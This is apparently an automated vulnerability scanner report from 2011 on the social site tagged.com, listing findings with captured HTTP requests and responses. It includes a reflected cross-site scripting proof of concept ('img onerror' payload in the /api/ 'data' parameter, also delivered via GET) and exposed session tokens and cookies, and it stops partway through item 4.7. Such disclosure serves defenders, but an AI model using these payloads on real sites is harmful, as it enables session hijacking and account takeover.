XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, www.tagged.com

Report generated by XSS.CX at Thu Jul 14 07:12:36 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://www.tagged.com/api/ [data parameter]

1.2. http://www.tagged.com/api/ [data parameter]

2. Session token in URL

2.1. http://www.tagged.com/api/

2.2. http://www.tagged.com/undefined/register

3. Flash cross-domain policy

4. Cookie scoped to parent domain

4.1. http://www.tagged.com/account_canceled.html

4.2. http://www.tagged.com/api/

4.3. http://www.tagged.com/browse.html

4.4. http://www.tagged.com/find_groups.html

4.5. http://www.tagged.com/forgot_password.html

4.6. http://www.tagged.com/help.html

4.7. http://www.tagged.com/safety.html

4.8. http://www.tagged.com/terms_of_service.html

5. Cross-domain Referer leakage

5.1. http://www.tagged.com/help.html

5.2. http://www.tagged.com/terms_of_service.html

6. Cross-domain script include

6.1. http://www.tagged.com/account_canceled.html

6.2. http://www.tagged.com/browse.html

6.3. http://www.tagged.com/find_groups.html

6.4. http://www.tagged.com/forgot_password.html

6.5. http://www.tagged.com/help.html

6.6. http://www.tagged.com/realtime_iframe.html

6.7. http://www.tagged.com/safety.html

6.8. http://www.tagged.com/terms_of_service.html

7. TRACE method is enabled

8. Email addresses disclosed

8.1. http://www.tagged.com/safety.html

8.2. http://www.tagged.com/terms_of_service.html

9. Robots.txt file

10. Content type incorrectly stated

10.1. http://www.tagged.com/api/

10.2. http://www.tagged.com/favicon.ico



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.tagged.com/api/ [data parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The value of the data request parameter is copied into the HTML document as plain text between tags. The payload e44a3<img%20src%3da%20onerror%3dalert(1)>f440c674f87 was submitted in the data parameter. This input was echoed as e44a3<img src=a onerror=alert(1)>f440c674f87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /api/?application_id=user&format=json&session_token=n1p0qgpt6cmo6i22240vdtb4s2 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Content-Length: 299
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; B=b=9C748D0299747383; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)


method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=MOtcjLSocm
method=tagged.util.echoIt&data=e44a3<img%20src%3da%20onerror%3dalert(1)>f440c674f87&callback=tagged.header.alerts.init&api_signature=&track=MOtcjLSocm
method=tagged.util.echoIt&data=300&callback=TAGGED.api.startDefer&api_signature=&track=MOtcjLSocm

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:54:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:54:55 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 266
Content-Type: text/html; charset=UTF-8

["{\"stat\":\"ok\",\"diagnostics\":\"0 1.9 27.102\",\"result\":{\"HTML\":\"\"}}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.0 27.102\",\"result\":\"e44a3<img src=a onerror=alert(1)>f440c674f87\"}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.0 27.102\",\"result\":\"300\"}"]

1.2. http://www.tagged.com/api/ [data parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The value of the data request parameter is copied into the HTML document as plain text between tags. The payload fe461<img%20src%3da%20onerror%3dalert(1)>645fbf8561e46756b was submitted in the data parameter. This input was echoed as fe461<img src=a onerror=alert(1)>645fbf8561e46756b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /api/?application_id=user&format=json&session_token=n1p0qgpt6cmo6i22240vdtb4s2&method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=MOtcjLSocm&method=tagged.util.echoIt&data=&callback=tagged.header.alerts.init&api_signature=&track=MOtcjLSocm&method=tagged.util.echoIt&data=300fe461<img%20src%3da%20onerror%3dalert(1)>645fbf8561e46756b&callback=TAGGED.api.startDefer&api_signature=&track=MOtcjLSocm HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; B=b=9C748D0299747383; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:56:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Length: 106
Content-Type: text/html; charset=UTF-8

{"stat":"ok","diagnostics":"0 1.9 26.51","result":"300fe461<img src=a onerror=alert(1)>645fbf8561e46756b"}

2. Session token in URL  previous  next
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


2.1. http://www.tagged.com/api/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /api/?application_id=user&format=json&session_token=n1p0qgpt6cmo6i22240vdtb4s2 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Content-Length: 299
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; B=b=9C748D0299747383; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)


method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=MOtcjLSocm
method=tagged.util.echoIt&data=&callback=tagged.header.alerts.init&api_signature=&track=MOtcjLSocm
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:37 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 222
Content-Type: text/html; charset=UTF-8

["{\"stat\":\"ok\",\"diagnostics\":\"0 1.9 24.104\",\"result\":{\"HTML\":\"\"}}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.0 24.104\",\"result\":\"\"}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.0 24.104\"
...[SNIP]...

2.2. http://www.tagged.com/undefined/register  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.tagged.com
Path:   /undefined/register

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /undefined/register?method=register_client&session_token=n1p0qgpt6cmo6i22240vdtb4s2&event_types=%5B%22toast_update%22%5D&jsCB=NodeFrame.handleResponse&_=1310644240834 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/realtime_iframe.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; B=b=9C748D0299747383; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Found
Date: Thu, 14 Jul 2011 11:50:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.tagged.com/account_canceled.html
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8


3. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tagged.com

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:12 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:12:27 GMT
ETag: "11289d-15d-49f3cbe55f0c0"
Accept-Ranges: bytes
Content-Length: 349
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.tagstat.com"/>
...[SNIP]...

4. Cookie scoped to parent domain  previous  next
There are 8 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


4.1. http://www.tagged.com/account_canceled.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /account_canceled.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account_canceled.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/realtime_iframe.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; B=b=9C748D0299747383; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:41 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:41 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:41 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:41 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:41 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11067

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Account Canceled</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet"
...[SNIP]...

4.2. http://www.tagged.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /api/?application_id=user&format=json&session_token=n1p0qgpt6cmo6i22240vdtb4s2 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Content-Length: 299
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; B=b=9C748D0299747383; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)


method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=MOtcjLSocm
method=tagged.util.echoIt&data=&callback=tagged.header.alerts.init&api_signature=&track=MOtcjLSocm
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:37 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 222
Content-Type: text/html; charset=UTF-8

["{\"stat\":\"ok\",\"diagnostics\":\"0 1.9 24.104\",\"result\":{\"HTML\":\"\"}}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.0 24.104\",\"result\":\"\"}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.0 24.104\"
...[SNIP]...

4.3. http://www.tagged.com/browse.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /browse.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /browse.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:43 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:43 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:43 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:43 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:43 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:43 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 22147

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Browse</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet" type="text
...[SNIP]...

4.4. http://www.tagged.com/find_groups.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /find_groups.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find_groups.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:50:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:50:48 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 85379

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Find Groups</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet" type=
...[SNIP]...

4.5. http://www.tagged.com/forgot_password.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /forgot_password.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /forgot_password.html HTTP/1.1
Host: www.tagged.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Cookie: __utmz=50703532.1310644622.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=50703532.1263323370.1305485630.1305485630.1310644622.2; S=jj0c352loqhjhbqn845b9fd986; B=b=20554EA40C2AE455; __qca=P0-1786245134-1310644618467; scorecardresearch=640548315-1958170528-1310644620670; __utmb=50703532.0.10.1310644622; __utmc=50703532
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

email=xss&resend=0&submit_btn=Submit

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:57:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=20554EA40C2AE455; expires=Fri, 13-Jul-2012 11:57:08 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=20554EA40C2AE455; expires=Fri, 13-Jul-2012 11:57:08 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=20554EA40C2AE455; expires=Fri, 13-Jul-2012 11:57:08 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=20554EA40C2AE455; expires=Fri, 13-Jul-2012 11:57:08 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=20554EA40C2AE455; expires=Fri, 13-Jul-2012 11:57:08 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11640

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Forgot Password</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet" t
...[SNIP]...

4.6. http://www.tagged.com/help.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /help.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help.html?topic=report-abuse HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=n1p0qgpt6cmo6i22240vdtb4s2; __qca=P0-1550185708-1310644205927; __utma=50703532.1718325401.1310644207.1310644207.1310644207.1; __utmb=50703532.0.10.1310644207; __utmc=50703532; __utmz=50703532.1310644207.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); B=b=9C748D0299747383

Response

HTTP/1.1 200 OK
Date: Thu, 14 Jul 2011 11:51:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
X-FRAME-OPTIONS: DENY
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
Set-Cookie: B=b=9C748D0299747383; expires=Fri, 13-Jul-2012 11:51:38 GMT; path=/; domain=.tagged.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11083

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>


<link rel="stylesheet" type="text/css" hr
...[SNIP]...

4.7. http://www.tagged.com/safety.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /safety.html

Issue detail

